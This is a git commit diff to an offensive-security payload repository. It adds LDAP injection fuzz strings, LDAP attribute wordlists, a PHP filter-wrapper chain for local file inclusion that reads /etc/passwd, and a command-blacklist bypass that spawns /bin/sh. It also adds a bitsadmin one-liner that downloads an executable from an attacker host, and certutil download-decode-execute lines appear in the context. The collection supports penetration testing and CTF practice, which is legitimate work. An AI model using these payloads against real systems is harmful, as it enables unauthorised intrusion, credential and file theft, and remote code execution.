LDAP fix typo + LDAP attributes + LFI filter chaining

2024-12-18 18:36:10 +00:00 · 2018-11-02 13:50:56 +01:00 · 2018-11-02 13:50:56 +01:00 · 6bcb43e39c
commit 6bcb43e39c
parent 86db6b7f6f
6 changed files with 43 additions and 12 deletions
--- a/Traversal/README.md
+++ b/Traversal/README.md
@ -151,6 +151,8 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```

+NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+
 ### Wrapper zip://

 ```python
--- a/injection/Intruders/LDAP_FUZZ.txt
+++ b/injection/Intruders/LDAP_FUZZ.txt
@ -29,6 +29,7 @@ x' or name()='username' or 'x'='y
 &
 (
 )
+)(cn=))\x00
 *(|(mail=*))
 *(|(objectclass=*))
 */*
--- a/injection/Intruders/LDAP_attributes.txt
+++ b/injection/Intruders/LDAP_attributes.txt
@ -1,9 +1,27 @@
-userPassword 
-surname 
-name 
-cn 
-sn 
-objectClass 
-mail 
-givenName 
-commonName
+c
+cn
+co
+commonName
+dc
+facsimileTelephoneNumber
+givenName
+gn
+homePhone
+id
+jpegPhoto
+l
+mail
+mobile
+name
+o
+objectClass
+ou
+owner
+pager
+password
+sn
+st
+surname
+uid
+username
+userPassword
--- a/injection/README.md
+++ b/injection/README.md
@ -26,6 +26,7 @@ query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
 *
 *)(&
 *))%00
+)(cn=))\x00
 *()|%26'
 *()|&'
 *(|(mail=*))
@ -84,7 +85,7 @@ commonName

 ## Exploiting userPassword attribute

-userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
+`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).

 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
@ -99,4 +100,5 @@ userPassword:2.5.13.18:=\xx\xx\xx

 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
-* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -94,6 +94,13 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```

+## Bitsadmin
+
+```powershell
+bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
+```
+
+
 ## Thanks to

 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
--- a/execution/README.md
+++ b/execution/README.md
@ -87,10 +87,11 @@ Bypass blacklisted word with double quote
 w"h"o"am"i
 ```

-Bypass blacklisted word with backslash
+Bypass blacklisted word with backslash and slash

 ```powershell
 w\ho\am\i
+/\b\i\n/////s\h
 ```

 Bypass blacklisted word with $@